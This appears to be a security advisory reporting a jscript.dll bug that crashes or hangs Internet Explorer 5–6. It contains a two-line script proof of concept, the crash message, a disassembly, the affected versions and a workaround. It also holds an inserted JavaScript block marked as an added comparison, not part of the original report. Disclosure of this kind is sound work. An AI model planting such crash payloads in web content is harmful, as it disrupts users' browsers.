Hi,

I found a bug in jscript.dll... here is a small report on it...
 
--------
Abstract
--------

Microsoft Corp.'s Windows Script Engine within the Windows operating
system (OS) interprets and executes script code written in scripting
languages such as VBscript and JScript. Such script code can be used to
add functionality to web pages, or to automate tasks within the OS or a
program. Script code can be written in several different scripting
languages, such as Visual Basic Script, JScript or JavaScript.

-----------
Description
-----------
By passing malicious JavaScript via Internet Explorer (IE), Outlook or
Outlook Express, remote attackers can crash Internet Explorer.
The bug lies in the Windows Script Engine's implementation of
JScript, which is provided by jscript.dll (located in %SystemRoot%\system32).
The following snippet of JavaScript code demonstrates the existence of the
bug by crashing IE on a vulnerable Windows system:

----------
Exploit
----------

<script>
  this.window();
</script>

or....

<script>
  self.window();
</script>
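For comparison, this is how a conforming JavaScript engine treats the same construct: the property lookup succeeds, but calling a non-callable host object raises a TypeError instead of dispatching through a bad pointer. This is an added example, not part of the original report; `hostObject` is a constructed stand-in for the browser's `window` object so the snippet runs outside a browser.

```javascript
// Constructed stand-in for the browser's global object: a plain, non-callable
// object that refers to itself, mirroring window.window === window and
// window.self === window.
const hostObject = { name: "window" };
hostObject.window = hostObject;
hostObject.self = hostObject;
// One genuinely callable member, to show the positive path as well.
hostObject.alert = (msg) => `alert:${msg}`;

// Invoke a named property of `obj` only if it is actually a function.
// Returns a result object rather than letting the failure bubble up.
function invokeProperty(obj, prop, ...args) {
  const member = obj[prop];
  if (typeof member !== "function") {
    return { ok: false, error: `${prop} is not callable (${typeof member})` };
  }
  try {
    return { ok: true, result: member.apply(obj, args) };
  } catch (e) {
    return { ok: false, error: `${e.name}: ${e.message}` };
  }
}

// The report's PoC expressed as a raw call on the stand-in object.
// A conforming engine throws TypeError here; the vulnerable jscript.dll
// instead reaches the corrupted indirect call shown in the disassembly.
function rawCallThrowsTypeError(obj) {
  try {
    obj.window();
    return false;
  } catch (e) {
    return e instanceof TypeError;
  }
}
```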
 
---------
Notes
---------

IE crashes in Win2k... with the following error
----------------------------------------------------
The instruction at "0x6b73aa15" referenced memory at "0x006f0063".
The memory could not be "read".
----------------------------------------------------

Disassembly... of JScript.dll[5.6.08513]...
6B73AA0A   je          6B73AA25
6B73AA0C   mov         eax,dword ptr [ebp-64h]
6B73AA0F   mov         eax,dword ptr [eax+8]
6B73AA12   mov         ecx,dword ptr [eax]
6B73AA14   push        eax
6B73AA15   call        dword ptr [ecx+8]        <--- illegal op
6B73AA18   mov         edx,dword ptr [ebp-4Ch]
6B73AA1B   push        edx
6B73AA1C   call        dword ptr ds:[6B773218h]
6B73AA22   add         esp,4
6B73AA25   mov         eax,dword ptr [ebp-34h]
6B73AA28   jmp         6B7213CB
6B73AA2D   mov         esi,dword ptr [ebp+18h]


We find that the value in ecx (i.e. the value at the memory location
pointed to by eax) is corrupted.


Please note:
A few times IE didn't cause an exception; instead it went into a sort of hung state.
The home/stop buttons and any new URL typed in the URL box didn't work.

---------------------------
Possible Solution
---------------------------
Disable Active Scripting


---------------
Tested On
---------------
IE 5.01 (Win2000)
IE 5.5  (Win98SE)
IE 6.0  (WinXP)

i.e.
JScript.dll versions
5.1.0.8513 (Win2000)
5.5.0.8513 (Win98SE)
5.6.0.6626 (WinXP Pro)
5.6.0.8513 (Win2000)


----------
Credits
----------
Real Name : Gregory R. Panakkal
Handle    : junkcode
E-Mail    : junkcode@gmx.net
WWW       : www.evilcreations.net/junkcode/  (OR)  www.crapware.tk

rgds,
junkcode